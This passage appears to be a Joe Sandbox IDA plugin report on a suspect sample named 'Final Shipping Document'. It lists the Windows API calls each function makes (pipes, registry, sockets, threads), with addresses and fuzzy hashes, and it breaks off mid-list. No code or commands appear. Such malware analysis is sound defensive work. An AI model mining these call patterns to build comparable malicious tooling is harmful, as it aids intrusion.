                                                            • Opcode Fuzzy Hash: 89c304296b5f2b97a85c52010ed0659b4f6df455edcf94ceaa98c022cf6dcdca
                                                            • Instruction Fuzzy Hash: 7421AE76A04219AFDB15DFACCC88EBF73ACEB093A4B008125BA14DB190D670ED41C760
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07842
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07868
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C0786B
                                                            • SysAllocString.OLEAUT32 ref: 00C0788C
                                                            • SysFreeString.OLEAUT32 ref: 00C07895
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C078AF
                                                            • SysAllocString.OLEAUT32(?), ref: 00C078BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 237f8821b23df62d30566accd022003f4bb721a55f478928f5d0b78cc69839b9
                                                            • Instruction ID: aa6755d6097050df353d4b6701c2d92bf05519e9c5302b28a692278ddb49ea9c
                                                            • Opcode Fuzzy Hash: 237f8821b23df62d30566accd022003f4bb721a55f478928f5d0b78cc69839b9
                                                            • Instruction Fuzzy Hash: A1216531A04104AFDB149FA8DC88EBE77ECEB097607108225F915EB1E1D674ED41CB64
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C104F2
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C1052E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                            • Instruction ID: 80a5222020c3133c1601a7292bfcd3f0dcbdb77f9abc480eb8e0bcba8ff9a4d1
                                                            • Opcode Fuzzy Hash: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                            • Instruction Fuzzy Hash: 4D218D71500305ABDB209F69DC44BDE7BA5AF46724F304A19F8B1E62E0D7B09AD0EF24
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C10601
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                            • Instruction ID: d7539e10c1fd4fdf51b144be98a7c6b429aba0e8b2936a8e3195187c000a1c45
                                                            • Opcode Fuzzy Hash: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                            • Instruction Fuzzy Hash: 7E216D755002059BDB209F698844ADAB7A4AF96721F300A19FCB1E72E0D7F099E1EB20
                                                            APIs
                                                              • Part of subcall function 00BA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BA604C
                                                              • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                              • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C34112
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C3411F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C3412A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C34139
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C34145
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                            • Instruction ID: 5ae09410ef85ca364b13b2fcf030644da3ab5280a34847754e05563a19f9407a
                                                            • Opcode Fuzzy Hash: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                            • Instruction Fuzzy Hash: F31186B21502197EEF219F64CC86EEB7F6DEF09798F014111FA18A6150C6729C61DBA4
                                                            APIs
                                                              • Part of subcall function 00BDD7A3: _free.LIBCMT ref: 00BDD7CC
                                                            • _free.LIBCMT ref: 00BDD82D
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDD838
                                                            • _free.LIBCMT ref: 00BDD843
                                                            • _free.LIBCMT ref: 00BDD897
                                                            • _free.LIBCMT ref: 00BDD8A2
                                                            • _free.LIBCMT ref: 00BDD8AD
                                                            • _free.LIBCMT ref: 00BDD8B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                            • Instruction ID: 7926a27bced7d7195f17d718900636a4fcc0fe919417e64c5f9b7be8ba976f39
                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                            • Instruction Fuzzy Hash: 30115E71540B44AAD621BFB0CC47FCBFBDCAF10700F4008A6B2DDA6392EA69B9059664
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0DA74
                                                            • LoadStringW.USER32(00000000), ref: 00C0DA7B
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0DA91
                                                            • LoadStringW.USER32(00000000), ref: 00C0DA98
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C0DADC
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C0DAB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 4072794657-3128320259
                                                            • Opcode ID: 9824ee5a4b8d64f63f5d35f4141c42be7d8af0079147c7124b7960f44fda7137
                                                            • Instruction ID: 5f401959d2b8c87e6442253851494ce23eb4e99d25b784e7c98cc4332fdf4d06
                                                            • Opcode Fuzzy Hash: 9824ee5a4b8d64f63f5d35f4141c42be7d8af0079147c7124b7960f44fda7137
                                                            • Instruction Fuzzy Hash: AA0162F25102087FEB109BA09DC9FEF326CE708701F400495B706F2081EA749E848F74
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(015DF8F8,015DF8F8), ref: 00C1097B
                                                            • EnterCriticalSection.KERNEL32(015DF8D8,00000000), ref: 00C1098D
                                                            • TerminateThread.KERNEL32(006F0074,000001F6), ref: 00C1099B
                                                            • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 00C109A9
                                                            • CloseHandle.KERNEL32(006F0074), ref: 00C109B8
                                                            • InterlockedExchange.KERNEL32(015DF8F8,000001F6), ref: 00C109C8
                                                            • LeaveCriticalSection.KERNEL32(015DF8D8), ref: 00C109CF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: f1337b27275384198cef7c1f2ebc19f77de35ab3648c5044725832cf83906070
                                                            • Instruction ID: 8afe808afceb5fc8e97a58358b9cf6618e67e52ea690b9427150090edf106fad
                                                            • Opcode Fuzzy Hash: f1337b27275384198cef7c1f2ebc19f77de35ab3648c5044725832cf83906070
                                                            • Instruction Fuzzy Hash: 78F0C932452A12ABD7515BA4EEC9BDEBA29BF05702F502025F202A08A1C7B595B5DF90
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C21DC0
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C21DE1
                                                            • WSAGetLastError.WSOCK32 ref: 00C21DF2
                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00C21EDB
                                                            • inet_ntoa.WSOCK32(?), ref: 00C21E8C
                                                              • Part of subcall function 00C039E8: _strlen.LIBCMT ref: 00C039F2
                                                              • Part of subcall function 00C23224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C1EC0C), ref: 00C23240
                                                            • _strlen.LIBCMT ref: 00C21F35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3203458085-0
                                                            • Opcode ID: 0fd01b54b36c83ec9bb55e5196ff8eb0adee00e8bd69ab36a6e2aeeb3dd59b1e
                                                            • Instruction ID: 89d76e8cc108dae3dc609191fb020453465c850eeb64555ae8f29a55fac8fa54
                                                            • Opcode Fuzzy Hash: 0fd01b54b36c83ec9bb55e5196ff8eb0adee00e8bd69ab36a6e2aeeb3dd59b1e
                                                            • Instruction Fuzzy Hash: A3B12230204350AFC320DF24D891F2A7BE5AF95318F58859CF8665B6E2CB71EE42CB91
                                                            APIs
                                                            • __allrem.LIBCMT ref: 00BD00BA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD00D6
                                                            • __allrem.LIBCMT ref: 00BD00ED
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD010B
                                                            • __allrem.LIBCMT ref: 00BD0122
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD0140
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                            • Instruction ID: 7445de534b29746397984d78874ca47e2df0853635a1563f4b2202651caffbb0
                                                            • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                            • Instruction Fuzzy Hash: 2381D072A01706ABE720AB29CC81B6AB3E9EF41364F2445BFF551D6381F770D9008B94
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC82D9,00BC82D9,?,?,?,00BD644F,00000001,00000001,8BE85006), ref: 00BD6258
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD644F,00000001,00000001,8BE85006,?,?,?), ref: 00BD62DE
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD63D8
                                                            • __freea.LIBCMT ref: 00BD63E5
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            • __freea.LIBCMT ref: 00BD63EE
                                                            • __freea.LIBCMT ref: 00BD6413
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: be693125efd12e894d7bc87f8ca4b44ca3a65f8e51c3a5646c7d80aecadcf6ab
                                                            • Instruction ID: 02be3f281eb55d4ce54846e5576871e998d23ef11b2ef2c7634a17ac24a465c1
                                                            • Opcode Fuzzy Hash: be693125efd12e894d7bc87f8ca4b44ca3a65f8e51c3a5646c7d80aecadcf6ab
                                                            • Instruction Fuzzy Hash: 5F51D172A00216ABDB258F68DC81FAFB7E9EB44720F1546AAFC05D6241FB34DC44D664
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2B6AE,?,?), ref: 00C2C9B5
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BCCA
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2BD25
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2BD6A
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C2BD99
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C2BDF3
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2BDFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 1120388591-0
                                                            • Opcode ID: 6f498bb31b8e38023f428154e1130deba00d2e75e79e637b3a4031845bc60477
                                                            • Instruction ID: c8247f49a803db49b862570ee154672b50de995124306f4018313872eb83f2e6
                                                            • Opcode Fuzzy Hash: 6f498bb31b8e38023f428154e1130deba00d2e75e79e637b3a4031845bc60477
                                                            • Instruction Fuzzy Hash: D081B030218241EFC714DF24D891E6ABBE5FF85308F14899CF5594B2A2DB31EE45CB92
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000035), ref: 00BFF7B9
                                                            • SysAllocString.OLEAUT32(00000001), ref: 00BFF860
                                                            • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF889
                                                            • VariantClear.OLEAUT32(00BFFA64), ref: 00BFF8AD
                                                            • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF8B1
                                                            • VariantClear.OLEAUT32(?), ref: 00BFF8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                            • String ID:
                                                            • API String ID: 3859894641-0
                                                            • Opcode ID: cab41b4c7559480d3bed14ab77fdb0b227e2946ee0d183e49ba3321d46b76c10
                                                            • Instruction ID: 6659c791250a91002e8579863b32eb7d8e9d51f60ae42231870b07fa912ca7ca
                                                            • Opcode Fuzzy Hash: cab41b4c7559480d3bed14ab77fdb0b227e2946ee0d183e49ba3321d46b76c10
                                                            • Instruction Fuzzy Hash: 6E51D43551031AFACF20AB65D8D5B39B3E4EF45310B2494E6EA05DF292DBB0CC44D796
                                                            APIs
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00C194E5
                                                            • _wcslen.LIBCMT ref: 00C19506
                                                            • _wcslen.LIBCMT ref: 00C1952D
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00C19585
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName$OpenSave
                                                            • String ID: X
                                                            • API String ID: 83654149-3081909835
                                                            • Opcode ID: 6595c19d11edf85ba3cd33bebbf0d1bf857bdf9eacb172d29a9bffb91c422b8c
                                                            • Instruction ID: 041d51319bd8a594112c156c2dfa2bcf61ed9879cc68e0387f9945c7a7de9703
                                                            • Opcode Fuzzy Hash: 6595c19d11edf85ba3cd33bebbf0d1bf857bdf9eacb172d29a9bffb91c422b8c
                                                            • Instruction Fuzzy Hash: B7E192715083108FD724DF24C891AAEB7E5FF86314F0485ADF8999B2A2DB31DE45CB92
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • BeginPaint.USER32(?,?,?), ref: 00BB9241
                                                            • GetWindowRect.USER32(?,?), ref: 00BB92A5
                                                            • ScreenToClient.USER32(?,?), ref: 00BB92C2
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB92D3
                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00BB9321
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BF71EA
                                                              • Part of subcall function 00BB9339: BeginPath.GDI32(00000000), ref: 00BB9357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 3050599898-0
                                                            • Opcode ID: 3dab923683e9db404ac867b82830ee534135b04785636856848a996981f29fa7
                                                            • Instruction ID: 131f70406b226c8caf4c6da042ac13987e2137b4c9b279bb18e3e1327b8553da
                                                            • Opcode Fuzzy Hash: 3dab923683e9db404ac867b82830ee534135b04785636856848a996981f29fa7
                                                            • Instruction Fuzzy Hash: 9D41AC71104200AFD721DF28DCC5FBA7BF8EF45720F1402A9FAA4972A2C7719949DB61
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C1080C
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C10847
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C10863
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C108DC
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C108F3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C10921
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
